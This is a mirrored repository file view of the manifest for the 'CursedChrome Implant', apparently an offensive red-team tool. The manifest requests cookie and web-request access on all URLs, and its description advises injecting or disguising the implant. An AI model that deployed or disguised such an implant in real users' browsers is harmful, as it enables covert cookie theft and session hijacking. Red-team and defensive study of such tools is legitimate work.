mirror of
https://github.com/mandatoryprogrammer/CursedChrome
synced 2026-06-08 15:39:30 +00:00
26 lines
639 B
JSON
Executable File
26 lines
639 B
JSON
Executable File
{
|
|
"name": "CursedChrome Implant",
|
|
"version": "0.0.2",
|
|
"manifest_version": 3,
|
|
"description": "Example Chrome extension with implant code. You should probably inject/disguise the implant instead of installing this extension directly.",
|
|
"homepage_url": "https://thehackerblog.com",
|
|
"icons": {
|
|
"16": "icons/icon16.png",
|
|
"48": "icons/icon48.png",
|
|
"128": "icons/icon128.png"
|
|
},
|
|
"default_locale": "en",
|
|
"background": {
|
|
"service_worker": "src/bg/background.js"
|
|
},
|
|
"permissions": [
|
|
"webRequest",
|
|
"cookies",
|
|
"storage",
|
|
"declarativeNetRequest"
|
|
],
|
|
"host_permissions": [
|
|
"<all_urls>"
|
|
]
|
|
}
|